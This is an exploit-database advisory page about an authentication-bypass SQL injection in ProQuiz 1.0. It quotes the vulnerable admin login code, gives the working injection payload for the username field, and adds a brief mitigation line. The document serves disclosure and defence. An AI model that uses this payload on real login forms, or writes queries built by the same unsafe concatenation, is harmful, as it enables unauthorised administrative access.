header-logo
Suggest Exploit
vendor:
ProQuiz
by:
Osirys
7.5
CVSS
HIGH
Sql Injection (Admin Login Bypass)
89
CWE
Product Name: ProQuiz
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:proquiz:proquiz:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ProQuiz 1.0 Sql Injection (Auth bypass)

The affected file is /admin/index.php. Just go in /[path]/admin/index.php. Login with the following details: Username : ' or 1=1# Password : anything

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [0] GENERAL DETAILS:

Name           :  ProQuiz 1.0 Sql Injection (Auth bypass)
Download       :  http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754
Vulnerability  :  Sql Injection (Admin Login Bypass)
Author         :  Osirys
Contact        :  osirys[at]live[dot]it

----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [1] BUG EXPLANATION:

The affected file is /admin/index.php. Let's see the code.

[CODE]
if($_GET['menu'] != 'madmin')
	{
	if(isset($_POST['username']) && isset($_POST['password']))
		{
			$query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' ";
[/CODE]

----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [2] EXPLOITATION:

Just go in /[path]/admin/index.php. Login with the following details:
Username : ' or 1=1#
Password : anything

----------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-12-09]

Navigation

Suggest Exploit

Services By CQR